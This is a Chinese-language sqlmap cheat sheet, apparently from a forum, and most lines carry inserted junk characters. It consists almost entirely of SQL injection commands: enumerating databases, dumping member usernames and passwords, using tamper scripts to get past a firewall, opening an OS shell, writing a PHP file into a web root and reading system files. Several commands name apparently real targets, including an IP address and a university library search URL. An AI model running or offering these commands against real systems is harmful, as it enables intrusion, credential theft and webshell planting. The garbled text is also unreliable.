/pentest/database/sqlmap" j& u1 Q/ F# k, G9 _ N: t
+ n6 P3 i. Q' Y- e- jupdate :::::> in the folder after execute following order : svn update
4 ]! a2 K/ M# T/ V) l1 v4 v! C% D0 R& z' N0 c$ J- `4 d
sqlmap.py -r 1.txt --current-db0 w `1 K: t3 k8 d' b0 m2 M' C
- k d5 Z1 U$ |; p7 W" ~v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
6 b5 F/ F# K+ I( I: w
. X; x& b8 z z+ h: s# f2 @& O==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 0 O) ~- `& x, B# ~, z* O% @
猜解数据库
' O1 N+ j' j$ p5 b./sqlmap.py -u "injection-url" --dbs, Y. J9 C3 V' g
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py": u* U$ F9 \) J, s) A
+ v9 F3 D+ u% g
猜解表名9 r6 e9 q2 r6 w2 J# z
./sqlmap.py -u "injection-url" -D database_name --tables
% _/ ~( ^1 N' c/ E: J9 [/ z) N4 |4 }# l) F5 j3 y
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py") s) m& v0 o9 P' M% ~
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 8 p6 N+ B' ~. P7 @" K' g
( |+ |: d+ ?- A5 o2 B, C
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump2 i2 n; O3 J5 y
( c( o& ^" j3 ?2 G8 d* M/ l$ Ssqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"3 |( z9 |0 v! k4 s) x
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"- W* @% C! f" V5 {
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
: Y6 l. u+ _. H& c5 J7 [8 c& ]sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"+ q ^: V w, j+ x
2 n$ c9 D3 B0 ?( ]5 e5 [
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"0 \. T# Q- } P# Z$ } y5 h1 g
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
4 A. G+ V& T9 O" b' G* w; \sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
: W' q% C+ M' t4 q0 g& p/ msqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
$ K) u1 w6 }- ^2 `3 i$ \: Hsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
1 Q1 {# U5 [+ _: k& F8 _2 i# y& L% r4 @9 r1 a. G9 D- o* Z: x
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
* F" G+ o+ @( u p1 ?1 ?sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
7 _" M6 X5 P/ o5 m7 s) X
! Y& ~7 m) E5 w5 P- ?/ y" isqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst". l7 N E& h0 t- l
猜解列名; n; l4 K. X# O8 v9 F
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
; N; r) y$ O9 u* \3 ]
7 i& {) D: }2 l0 D. fsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" $ y# P* A* m$ |: M
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
! C7 Q5 V. t0 h& z: asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
( Z2 w1 z3 U" y8 _; Y0 J2 c( r. X1 L8 }: S0 e2 f3 Q
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
' A$ e2 l1 f! A3 ^1 v" F4 r; Q&submit=Go
& H: Y2 _6 k1 N' s3 i# E! N* @, c9 j6 M猜解值" b1 v# i. I; D% ?5 A
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump, @- P5 c" @& p. ?6 j
========================================================
; m2 e7 |8 | L# W$ c' @9 ~搜索表名中包括mana字符的% T& f) h V2 `7 E
/sqlmap.py -u "injection-url" -T mana --search
9 k" W% L7 @2 t3 Y/ \0 E返回一个交互式sql shell
' P t5 s+ d& W/sqlmap.py -u "injection-url" --sql-shell( y9 L6 Q2 j# R( s3 ^0 u1 q/ U
读取指定文件(需权限)
0 F& Y4 V; y0 t8 F; U/ e/sqlmap.py -u "injection-url" --file-read "c:\boot.ini": q, c3 t* y" p' P: j. p+ }# h
查看当前 用户 及 数据库
0 \( J1 z1 I2 Q3 S/sqlmap.py -u "injection-url" --current-user --current-db( d, A' z3 D. d% [. }4 L b }& _7 O
本地文件 写入 远程目标绝对路径
d8 l* { P' ?& Q" I/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径1 o- E$ ~2 L) z
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 2 }3 M0 K; |) f3 s+ u
! D& q* Y+ W. E- y, ]% p$ T
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
1 D2 i8 M) B2 M查看某用的权限
0 Q' z Y: g+ c( h/sqlmap.py -u "injection-url" --privileges -U root7 Q- ]: {" Q+ \+ @
查看当前用户是否为dba4 G' s% h# J. x( [$ l
/sqlmap.py -u "injection-url" --is-dba
6 v7 V' f2 O( M+ b8 u1 C3 A读取所有数据库用户或指定数据库用户的密码
& `% W9 j7 _& c0 t, u. {( z; Xsqlmap.py -r 1.txt --users --passwords
Q" a, @- }9 c3 Gsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" d( H: r8 u5 g! b; G
* u: I& C: o- A5 I/ `( [/sqlmap.py -u "injection-url" --passwords -U root
" v$ h8 `& D0 L$ _' W* _: {
, p7 M& a0 s5 Q5 b) _: n--start&&--stop 与 --first&&--last 的区别
: c& }0 z; O5 H" _$ g: n9 @ f/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
' k; B+ T- w" q' q% l; U" { J8 p3 H" r. ], g6 e
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)6 M* h) ~1 L) }1 c: E" ?
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
) [/ \" q" F& A4 [/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns3 T: D. I( ?# a B+ O" D7 d
2 I+ a- S& i1 O& R. d执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……) r3 e( _" O) c+ I& h& _8 S) B
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
3 E5 t" q' u/ Y9 G7 h3 l& Z1 g3 N% l' d1 E" I j& J4 d
|